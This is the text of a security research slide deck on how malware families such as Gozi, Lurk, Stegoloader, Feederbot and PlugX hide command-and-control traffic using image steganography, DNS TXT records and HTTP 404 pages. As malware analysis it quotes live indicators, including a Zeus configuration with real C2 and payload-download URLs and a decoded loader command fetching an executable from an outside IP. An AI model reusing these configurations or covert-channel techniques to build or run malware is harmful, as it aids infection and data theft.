Hiding in Plain Sight
advertisement
Hiding in Plain Sight
Advances in Malware Covert Communication Channels
Pierre-Marc Bureau
Christian Dietrich
Outline
1.
2.
Covert Channels
Steganography
a.
b.
c.
3.
Inconspicuous Carrier Protocols
a.
b.
c.
4.
Lurk
Gozi
Stegoloader
Feederbot
PlugX
Hiding in HTTP
Conclusions
Covert Channels and Malware -- Why?
●
●
●
●
●
Receive commands from operator
Send feedback to operator
Receive updates and modules from operator
Exfiltrate data
Evade security
○
○
○
○
Intrusion detection
Antivirus
Incident response
Forensics analysis
3
Definitions
Covert Channels
Capability to transfer information between two hosts, which are not explicitly
allowed to communicate.
Steganography
The practice of concealing messages or information within other non-secret
text or data.
Carrier Protocol
The underlying protocol of the C2 protocol, e.g. HTTP.
4
Malware involving unique C2 Channels
Sophistication
C2 Technique
Examples
+
HTTP, possibly encrypted
Today’s average $botnet
++
Email, Removable Drives
FANCY BEAR/APT28, Stuxnet
+++
Steganography, Covert Channel
In this talk
5
6
7
Zeus KINS (Not Steganography)
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
ff
01
70
00
00
5a
00
1c
72
19
70
65
74
44
d8
2c
20
10
01
00
06
02
1c
00
6d
72
65
61
ff
00
33
01
38
03
53
19
02
12
65
20
72
74
e0
00
2e
2c
42
1b
65
00
19
43
6e
4c
20
61
00
ff
30
00
49
25
72
0c
00
6f
74
61
4e
1c
10
ed
00
00
4d
47
76
43
08
6d
1c
62
65
02
4a
31
38
00
04
1c
65
6c
43
70
02
1c
74
19
46
ec
42
01
04
02
72
6f
6f
75
19
02
77
00
49
50
49
00
00
00
1c
75
6d
74
00
19
6f
0b
46
68
4d
01
00
00
02
64
70
65
0c
00
72
44
00
6f
03
01
00
02
19
20
75
72
43
10
6b
61
01
74
ed
2c
00
00
00
53
74
20
6f
43
1c
74
01
6f
00
00
02
04
03
65
65
45
6d
6f
02
61
01
73
00
00
2c
1c
43
72
72
71
70
6d
19
20
01
68
00
00
1c
02
50
76
1c
75
75
70
00
4d
2c
6f
00
01
01
05
55
65
02
69
74
75
04
69
|......JFIF.....,|
|.,....1.Photosho|
|p 3.0.8BIM......|
|...,.......,....|
|..8BIM.......,..|
|Z...%G..........|
|..Server.....CPU|
|.....Cloud Serve|
|r.....Computer..|
|...Computer Equi|
|pment.....Comput|
|er Lab.....Compu|
|ter Network.....|
|Data.....Data Mi|
8
Zeus KINS (Not Steganography)
00013790
000137a0
000137b0
000137c0
000137d0
000137e0
000137f0
00013800
00013810
00013820
00013830
00013840
00013850
00013860
cf
9f
33
59
45
77
66
38
54
78
4d
74
63
70
98
ff
76
69
6a
36
61
6c
5a
4a
37
30
4b
4f
7d
fe
57
6b
2f
45
64
6e
54
52
57
58
6e
2b
54
3f
34
79
7a
70
31
54
73
64
61
44
6f
65
83
10
2f
71
35
33
67
7a
58
71
39
4d
6e
4b
45
00
55
78
53
50
76
59
2f
78
57
33
2b
6e
57
00
41
7a
4c
6b
71
49
42
70
55
50
70
36
8d
50
44
6a
54
72
59
5a
30
44
76
4a
67
4a
89
ff
64
37
63
4b
4c
4d
54
7a
49
75
72
44
6c
70
4a
50
4e
57
4c
6d
2f
76
41
57
35
77
13
b5
6a
47
65
6f
70
4b
69
50
74
6f
6b
33
91
ec
4b
34
5a
77
4f
37
4d
33
46
75
6a
6e
45
03
6d
51
54
34
54
30
56
48
78
36
64
52
2e
00
62
74
62
6a
65
54
54
48
5a
57
41
55
61
00
2b
58
74
6c
46
34
49
66
44
35
62
34
f2
37
31
34
54
41
43
51
70
39
75
45
67
6b
|..}T.EW..l..E.a.|
|...?...P.p.....7|
|3vW4/UADdJjKmb+1|
|Yikyqxzj7PG4QtX4|
|Ej/z5SLTcNeZTbtT|
|w6Ep3PkrKWow4jlA|
|fad1gvqYLLpOTeFC|
|8lnTzYIZMmK70T4Q|
|TZTsX/B0T/iMVTIp|
|xJRdqxpDzvP3HHf9|
|M7Wa9WUvIAtFxZDu|
|t0XDM3PJuWou6W5E|
|cKnon+pgr5kjdAbg|
|pO+eKn6JDw3nRU4k|
9
Zeus KINS (Not Steganography)
{{VERSION}}
2.0.0.0
{{VERSION}}
{{DROPZONE_URLS}}
http://146.185.243.71/googleAD/cde.php
{{END_DROPZONE_URLS}}
{{BINARY_URLS}}
http://146.185.243.71/googleAD/update.exe
{{END_BINARY_URLS}}
{{WEBFILTERS}}
!*.microsoft.com/* (monitor)
!http://*myspace.com* (monitor)
https://www.gruposantander.es/*
!http://*odnoklassniki.ru/* (monitor)
!http://vkontakte.ru/* (monitor)
@*/login.osmp.ru/* (Monitor and
screenshots)
@*/atl.osmp.ru/* (Monitor and screenshots)
$http://www.apple.com/mac/
$http://digg.com/news*
{{END_WEBFILTERS}}
{{VNC_PLUGIN}}
http://146.185.243.71/googleAD/mod_vnc.bin
{{END_VNC_PLUGIN}}
{{MODULE}}
http://146.185.243.71/googleAD/mod_spm.bin
{{MODULE}}
10
Gozi Neverquest
Gozi
●
●
●
●
Appeared in 2007
Aliases: Vawtrak, Neverquest
Objectives: Banking fraud
Characteristics
○
○
○
○
Process injection to change browser behavior
Password stealing
Remote access: VNC & SOCKS
Deletes browsing history to hide infection vector
12
Gozi C2 Channels
●
HTTP POST
●
Linear Congruential Generator
●
aPlib compression
13
Gozi Covert Channels
●
●
Steganography feature added beginning of 2015
Downloads information in favicon.ico
○
○
●
●
SSL (https)
Tor (tor2web)
Extracts information using LSB steganography
Decrypts information using RC4
14
Least Significant Bit Steganography
0 0 0 1 0 0 1 1
0 1 1 0 0 0 1 1
1 1 1 1 0 1 1 0
α
1 0 0 1 0 0 1 1
0 0 0 1 0 0 1 0
0 0 1 0 0 0 1 0
0 1 0 1 0 1 1 0
α
0 1 0 0 0 0 1 1
15
Gozi’s Steganography
https://6hts7b7onuh653ha.tor2web.org/favicon.ico
16
Gozi decoded information
00000000
00000010
00000020
00000030
00000040
00000050
00000060
00000070
00000080
00000090
000000a0
000000b0
000000c0
000000d0
000000e0
000000f0
00000100
00000110
00000120
76
c2
b8
70
a5
41
9d
d4
44
65
6f
6b
2e
15
e0
c8
00
28
d0
f6
f3
17
eb
32
6a
6c
f3
6e
62
2e
65
73
e1
5a
c7
00
c5
f3
27
bd
8d
13
7f
30
8c
ee
75
61
73
61
75
fb
ff
7e
00
61
12
fd
f2
5d
a7
b4
26
7d
07
76
6e
75
67
00
76
76
05
00
00
01
c2
8b
c8
d2
2c
df
9f
67
61
75
00
65
00
23
2c
bc
b1
00
c4
df
99
e7
d7
1e
a3
41
56
74
6b
6d
65
f2
73
00
ec
02
00
f3
95
92
89
a2
12
63
65
e8
6f
2e
65
68
12
a4
00
9a
00
00
12
f6
3a
22
6d
3d
ec
18
e1
7a
73
69
2e
00
13
00
76
00
00
00
62
32
da
d2
3d
52
85
59
61
75
63
72
28
fe
38
5c
00
f8
58
ba
6d
cc
47
4a
4d
eb
70
67
00
6f
75
c5
ff
00
04
00
b5
00
1b
d7
d3
29
a3
5d
61
47
2e
70
6f
00
61
ff
00
3b
00
9a
00
2c
92
67
ca
4f
6f
27
0f
73
75
67
6c
00
ff
00
01
00
76
00
d6
30
55
df
4a
a6
9c
7e
75
78
2e
61
38
d3
ca
04
00
14
00
8a
6c
55
f6
c7
e3
20
79
00
69
6b
62
fb
5d
c7
01
f4
04
00
75
22
30
13
3e
be
5f
df
78
6c
7a
65
12
ff
7e
00
12
76
00
be
76
e7
2e
9a
27
46
41
65
6f
00
61
00
76
05
00
00
00
00
|v.'.....b..,..u.|
|.......:2m..0l"v|
|...]..."...gUU0.|
|p......m.G).....|
|.2..,..==J.OJ.>.|
|Aj0&..c.RM]o...'|
|.l.}.Ae...a'. _F|
|....gV..YpG.~y.A|
|Dnuvatozag.su.xe|
|ebanuk.su.puxilo|
|o.su.meicoog.kz.|
|keageeh.ru.labea|
|.su.....(.a.8...|
|...v#s.......].v|
|.Z.v,...8.....~.|
|..~....v\.;.....|
|................|
|(.a........v..v.|
|........X.......|
17
Lurk
19
Lurk
●
●
●
●
Downloader, used to install click fraud malware
Distributed through exploit kits
Hides download URLs in images using LSB steganography
String obfuscation and XOR encoding for payloads
20
More Lurk Steganography
21
Stegoloader
Stegoloader
23
Stegoloader
●
●
Information stealer
“Downloader” module
○
○
○
○
●
●
Spots analysis environment
Downloads image from legitimate websites
Extracts main module code from image
Launch main module code
Creates a verbose profile of infected hosts
Downloads modules, depending on host profiles
24
Stegoloader - Infection
●
●
Websites pretending to deliver key
generators are used to distribute the
malware
New variants appear almost on a
daily basis
25
Stegoloader Image Processing
PNG Image
LSB extraction
RC4 decryption
Code
push
mov
sub
push
push
push
...
ebp
ebp, esp
esp, 24h
esi
edi
14h
26
27
Stegoloader - Software Protection
●
Resolve “funky” imports
●
GetCursorPos()
●
Dynamic construction of strings
●
List running processes
28
Stegoloader Debug Reporting
55
56
57
58
59
60
61
62
63
64
404
404
404
404
404
404
404
404
404
HTTP
HTTP
HTTP
HTTP
HTTP
HTTP
HTTP
HTTP
HTTP
innonation.com.hk /report_N_0024_405A197B534CD001-_39_page_ok
innonation.com.hk /report_N_0024_405A197B534CD001-_40_image_size_ok
innonation.com.hk /report_N_0024_405A197B534CD001-_41_image_type_ok
innonation.com.hk /report_N_0024_405A197B534CD001-_42_gdiplus_ok
innonation.com.hk /report_N_0024_405A197B534CD001-_43_image_ok
innonation.com.hk /report_N_0024_405A197B534CD001-_44_crc_ok
innonation.com.hk /report_N_0024_405A197B534CD001-_45_payload_ok
innonation.com.hk /report_N_0024_405A197B534CD001-_46_payload_size_ok
innonation.com.hk \\
/report_N_0024_405A197B534CD001-_47_payload_type_shell
404 HTTP innonation.com.hk /report_N_0024_405A197B534CD001-_48_payload_mem_ok
29
Stegoloader Module Interaction
Deployment Module
Main Module
Geolocation Module
Recent Documents
Module
Password Stealer
IDA License Stealer
Distraction (?) Payload
Monetization Payload
30
Stegoloader Network Communications
●
HTTP POST
●
RC4 Encryption
●
Base64 Encoding
●
LZMA Compression
31
Stegoloader “scenarios”
->
<->
<->
<->
<->
<->
<->
<->
<->
<->
<->
<->
<->
<->
<->
0x00
0x03
0x03
0xdc
0xdc
0xdd
0xdd
0xde
0xde
0xdf
0xdf
0xe0
0xe0
0x64
0x64
0x04
0x04
0x05
0x05
0x06
0x06
0xd2
0xd2
0x64
0x64
0x64
0x64
0x01
0x01
SysInfos
{"data": {"OsID":
WindowsTimeStamp
{"WindowsTimeStamp": "
WindowsInstallTimeStamp
{"WindowsInstallerTimeStamp": "
WindowsPrefetchTimeStamp
{"WindowsPrefetchTimeStamp":
SwapTimeStamp?
{}
Unknown/Noop
{}
Geoloc shellcode
Geoloc result
GetInstalledSoftware
{"Software": "<base64>"...
Browsing history
empty
Browsing history
empty
GetSoftwareKeys
{"SoftwareKeysSystem": "
Pony infostealer, size 38439
List recently opened documents, size 7344
Kill bot
OK, killed
32
33
Summary
Malware
Stego
algo
File
type
Compression
Crypto
Gozi
LSB
ico
None
RC4
Lurk
LSB
bmp
None
Custom
Stegoloader
LSB
png
None
RC4
Compression
Encryption
Steganography
34
Covert Communication Channels
DNS
;QUESTION
newcommunitybank.com. IN A
;ANSWER
newcommunitybank.com. 86400 IN A 74.54.82.153
;QUESTION
1.f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. IN ANY
;ANSWER
1.f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. 0
IN TXT
"aYpYOb/6L5NRMxDRbwQDrVfPJDw5yogih+zlfj+lQpRDPZE4n1DWB0M/l0J6YDp88Vgm"
36
Why DNS for C2?
●
No specific detection for the DNS protocol
○
Existing DNS-based protection means target
domain names resolved via DNS, but rarely DNS
traffic in general
○
●
Often unfiltered
○
●
(Syntactically valid) DNS with third-party resolvers
often allowed
Even in firewalled environments, DNS often
allowed and unfiltered
Designed as a distributed system
○
Provides advantages to the malware operator
37
Grandjean, Martin (2014). "La connaissance est un réseau"
Feederbot - A botnet with DNS C2
●
●
●
●
●
●
●
Initially discovered in 2010
Named Feederbot based on a characteristic string
“feedme” in the binary
Performs ad/click fraud
Implements a covert channel via DNS
Several query domain schemes
Well-known registered domains and unregistered domains
Distributed infrastructure, spread over multiple
Autonomous Systems
38
Feederbot DNS C2
;QUESTION
1.f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. IN ANY
;ANSWER
1.f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4.google.com. 0
IN TXT
"aYpYOb/6L5NRMxDRbwQDrVfPJDw5yogih+zlfj+lQpRDPZE4n1DWB0M/l0J6YDp88Vgm"
●
50-char system-dependent bot ID:
f16e180e9093c237ea31a4ab55ae7fac710a14e4972b30fdf4
●
RC4-encrypted bootstrap traffic
0000
0010
0020
●
8E 68 00 00 0B 00 00 00 17 00 00 00 39 34 2E 32
33 2E 36 2E 36 37 00 69 6D 61 67 65 73 2E 6D 6F
76 69 65 64 79 65 61 72 2E 6E 65 74 2E 00 3C
.h..........94.2
3.6.67.images.mo
viedyear.net..<
Contains a referral to the next C2 server node 94.23.6.67
39
Feederbot DNS C2 referral
0000
0010
0020
●
●
8E 68 00 00 0B 00 00 00 17 00 00 00 39 34 2E 32
33 2E 36 2E 36 37 00 69 6D 61 67 65 73 2E 6D 6F
76 69 65 64 79 65 61 72 2E 6E 65 74 2E 00 3C
.h..........94.2
3.6.67.images.mo
viedyear.net..<
Basically a referral to a subsequent C2 server node 94.23.6.67
First DWORD is a magic value used to query subsequent C2 nodes:
0x688e (26766)
●
●
●
Second DWORD is the length of the next C2 server string (0xB, 11 chars)
Third DWORD is the length of the domain for subsequent C2 queries (0x17,
23 chars)
Subsequent C2:
;QUESTION
0.26766.images.moviedyear.net. IN TXT
40
Feederbot C&C message structure
● Inside the rdata field of a DNS response carrying a TXT resource record
● Maximum length of 220 bytes per message (chunking)
● Lots of different RC4 keys
41
PlugX
OPERATIONAL
WINDOW
Multiple years
ARCHITECTURE
TARGETING
Government
Defense
TOOLS
PlugX
Aerospace
Pro-Democracy
Modular, Plugin-Based
Multiple C2 Carrier Protocols
42
PlugX DNS C2
;QUESTION
CCCCCCOBOPNMMDLBINCDMIGOAEKJEPOEIKCAMFGLPAKGEMOBIHCNLCFIPNJDDJN.
OHEBKKPEFOKIACGMLGBPGJMDCNHHNBDLIFOPDJJDPNEGKAAKFELOAIGCMMBGHAN.
KCEINNHDBJLOFEPJJP.bad.domain.com
IN
TXT
●
●
●
●
●
DNS C2 channel (XSoDNS)
Base16 encoding with custom alphabet
Randomness in the first few bytes for each
request
Byte at offset 3 is always 0x1e (decimal 30)
In the encoded query domain: ‘OB’ at offset 6
"The length of any one label is
limited to between 1 and 63
octets. A full domain name is
limited to 255 octets (including the
separators)."
RFC2181
43
Hiding commands in HTTP error messages
HTTP/1.1 404 Not Found
Date: Mon, 9 Jul 2015 06:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding,User-Agent
Content-Length: 357
Connection: close
Content-Type: text/html; charset=utf8
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not
Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /XXX/YYY.php was not
found on this server.<P><HR><ADDRESS></ADDRESS></BODY></HTML><!-- DEBUG:
MTQyODUyMTUyMzcyOTk5MyNsb2FkZXIgaHR0cDovLzExMS4xNzkuMzkuODMvZ29sZGVuMy5leGUjMTQyOD
UxMjA2MTc1NDYzNSNyYXRlIDYwIwDEBUG-->
44
Hiding commands in HTTP error messages
HTTP/1.1 404 Not Found
Date: Mon, 9 Jul 2015 06:13:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding,User-Agent
Content-Length: 357
Connection: close
Content-Type: text/html; charset=utf8
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not
Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /XXX/YYY.php was not
found on this server.<P><HR><ADDRESS></ADDRESS></BODY></HTML><!-- DEBUG:
MTQyODUyMTUyMzcyOTk5MyNsb2FkZXIgaHR0cDovLzExMS4xNzkuMzkuODMvZ29sZGVuMy5leGUjMTQyOD
UxMjA2MTc1NDYzNSNyYXRlIDYwIwDEBUG-->
1428521523729993#loader http://111.179.39.83/golden3.exe#1428512061754635#rate 60#
45
Conclusions
Conclusions
●
●
Real-world examples, used in cybercriminal and targeted activities
Covert channels are used for malware C2 under certain conditions
○
○
●
●
●
●
If used with cryptography
And for small messages
Protocols that consume bandwidth might serve better to encode
significant amounts of information
Unidirectional communication at this point
Leveraging benign infrastructure for C2 or malware storage
Covert channels involving steganography or hiding messages in carrier
protocols makes C2 channels more difficult to detect
47
Thank you!
Special thanks to:
Tillmann Werner
Brett Stone-Gross
Pallav Khandar
Jesse Gabriel
●
Hidden communication channels are currently being used in all kinds of
malware including information stealers, RATs, DDoS tools and malware
downloaders
●
Cyber criminals and nation state actors hide malicious communication
using steganography and inconspicuous carrier protocols
●
Hidden communication channels are designed to be hard to identify,
both for researchers and automated tools
References
●
●
●
●
●
●
●
●
●
https://blog.malwarebytes.org/security-threat/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-bankingtrojan/
http://www.secureworks.com/cyber-threat-intelligence/threats/malware-analysis-of-the-lurk-downloader/
https://www.sophos.com/en-us/medialibrary/PDFs/technical%20papers/sophos-vawtrak-internationalcrimeware-as-a-service-tpna.pdf
http://blog.crowdstrike.com/storm-chasing/
http://www.secureworks.com/cyber-threat-intelligence/threats/stegoloader-a-stealthy-information-stealer/
http://www.cj2s.de/On-Botnets-that-use-DNS-for-Command-and-Control.pdf
https://blog.fortinet.com/post/hiding-malicious-traffic-under-the-http-404-error
http://www.crowdstrike.com/global-threat-report-2014/
http://cuing.org/
